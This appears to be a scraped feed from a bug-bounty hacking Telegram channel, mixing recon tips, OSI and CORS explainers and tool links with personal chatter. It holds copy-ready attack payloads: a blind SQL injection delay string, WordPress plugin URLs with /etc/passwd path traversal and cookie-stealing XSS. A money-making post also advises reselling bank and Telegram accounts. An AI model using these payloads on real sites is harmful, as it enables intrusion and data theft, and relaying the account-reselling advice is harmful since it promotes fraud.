2246
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
🔥Quick NextJS Website Recon Tip by renniepak
A quick way to find "all" paths for Next.js websites:
👇DevTools->Console
console.log(__BUILD_MANIFEST.sortedPages)Читать полностью…
javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));
🚨 Ever wonder why your API calls are getting blocked?
Cross-Origin Resource Sharing (CORS) can be the culprit! When your JavaScript tries to communicate with an API on a different domain, the browser steps in to protect you. CORS ensures that only approved domains can make those requests. Learn how to manage these "preflight" checks and configure your server correctly to allow legitimate cross-origin requests.
Hit save to stay in the know and never let CORS block your code! 🔒
👉 Follow us for more cybersecurity tips and tricks!
🌐 Visit us at www.cipherops.xyz
📲 @cipherops.tech
https://www.instagram.com/p/C_fObBqShyT/?igsh=dWloN2lpeGx0ZHU0
Tricky ASP blind SQL Injection in a login page.
Payload👇
';%20waitfor%20delay%20'0:0:6'%20--%20
⚡️Wordpress Endpoints to look -
check this if you have these plugin. ⚡️
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Deobfuscation and analysis
of client-side JavaScript code
to detect DOM-based XSS.
Join the discussion group guys
/channel/bug_hunting_talks
today i got an intresting reflected xss, in karnataka gov website
/kn where the lang_name param is vulnerable
Thanks, guys for this suggestion I was stuck but seeing the money and the content provided by hackthebox academy, i am planning to first take the CPT as it covers almost all the topics and also so many people says that the exam. Is more tougher than oscp, so after reading all those articles and redit suggestion and youtube review, I am planning to first complete the CPT, once done later I will take the OSCP. And I also suggest you guys this only if you are a beginner or a intermediate, first take the alternative courses to oscp, and once you get things done, you will get confident and later you can pass the oscp in one time. Bec it cost a lot........ 🤑💰
Читать полностью…
Follow the Tech Tips and_hacking channel on WhatsApp: https://whatsapp.com/channel/0029Va9Xem2EQIakni6dZp1A
Читать полностью…
Add the folder 'home/000~ROOT~000/' to your wordlist, and you might discover some juicy data. Enjoy!"
Читать полностью…
OSI Model
____ __ _
The OSI (Open Systems Interconnection) model is a conceptual framework used to understand and standardize the functions of a networking system. It divides the process of communication in a network into seven distinct layers, each responsible for different aspects of data transmission.
The Seven Layers:
1️⃣Physical Layer (Layer 1): Deals with the physical connection between devices, including cables, switches, and the transmission of raw binary data.
2️⃣Data Link Layer (Layer 2): Manages the data frames between two directly connected nodes and handles error detection and correction.
3️⃣Network Layer (Layer 3): Responsible for logical addressing and routing, ensuring that data packets are sent from the source to the destination across multiple networks.
4️⃣Transport Layer (Layer 4): Provides end-to-end communication, error recovery, and flow control between devices, often using protocols like TCP and UDP.
5️⃣Session Layer (Layer 5): Manages sessions or connections between applications, establishing, maintaining, and terminating communication.
6️⃣Presentation Layer (Layer 6): Translates data between the application layer and the network, handling data encryption, compression, and conversion.
7️⃣Application Layer (Layer 7): Interfaces directly with the end user, providing network services such as email, file transfer, and web browsing.
🔵 How to make money on Telegram {Full Guide} 🔤
1. Start doing Airdrops today ! When new crypto currency launches and pay people for small tasks like channel join and refers, it is called Airdrop.
There are many telegram bots for Airdrops which are legit like KuCoin , Tomarket etc
2. Make a channel and start collecting audience. If you have audience, then you can sell courses and things, you can earn by Ad revenue, you can earn by doing Promotions.
There are always a easy way and a hard way for everything. If you want hard way, then you can make content and share it in channel with your channel link in the post so that organic members come when audience share your post. OR by the easy way you can invest some money to buy paid promotions and easily scale up your earnings abd reach. (Easy way is better in my view)
3. Now on your channel, you can refer, you can sell, you can promote. Earnings will increase in proportion to activeness in your channel. So NEVER force anyone to join your channel. [It's so cheap]
4. Join public groups and star reselling stuff like Bank accounts, ott accounts, subscriptions, tg accounts or any stuff. Market on Telegram Groups is so big. You haven't seen it yet.
5. It's important to keep your mind calm and bring consistency in your work to make it work. So eat healthy, meditate 10 mins daily and live with good mindset people. Your company decides your future.
🙂 Must join our Channel @bugbounty_tech
Give Reactions fast and share post else no more methods 💧
https://cyfare.net/
- ExploitDB - Exploits, Shellcodes, Dorks
- Malware Query Engine - Download, Search, Hunt & Intel
- Sandbox - Best Free Deep File Scanner with Unlimited file scans, 100+ yara rules, based on OPSWAT next-gen sandbox
Blackbox-Fuzzing of IoT Devices Using the Router TL-WR902AC as Example - https://tsmr.eu/blackbox-fuzzing.html
Читать полностью…
Analysis of CVE-2024-43044 — From file read to RCE in Jenkins through agents
https://blog.convisoappsec.com/en/analysis-of-cve-2024-43044/
☄️AutoRecon- It is a multi-threaded network reconnaissance tool which performs automated enumeration of services.
🔗https://github.com/Tib3rius/AutoRecon
Actually I am using foreign number soo not to worry if It's ban in India.
Читать полностью…
pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce" rel="nofollow">https://medium.com/@pawan_rawat/github-recon-for-finding-sensitive-information-aecdeb9c9dce
Читать полностью…
I am really. Sorry guys, I left my place bec of some emergency work. I will only coming back on Monday soo I will not going to be active till Monday, soo please don't mind.
Читать полностью…
Small update on the upcoming video
I will upload it soon😌
I was Meditating for Ideas And This Popped up
" The Thoughts From Universe"
Idk We will call It whatever
Coz I am not familiar with this concept
Says That
Universe Live At Harmony at Neutral state(=) and That's the Refresh point
But Grows and Falls on charge state ( - or +)
Means At charged State It Grows
Eg - Success and Failure
And In Charge state
Both comes in one Hand
If There success then Failure Will be must And
Both success and Failure will try to be of Equal charge
Eg - 10 wins Means Mostly You will get 10 Failure too After the Wins
But At fall state You can Neutralise It by Wins Or Something Polar opposite to That
To Refresh the starting point
Like If You Are Having Intense Cravings about Something
Then Then Think Painful thoughts about that Addiction
Then Thing will neutralise
I Just Wrote this down
Coz I found this interesting
And It's A Thought from somewhere in Universe
I know it sounds lots like Yapping
But I would take it seriously
- Aijak Ofc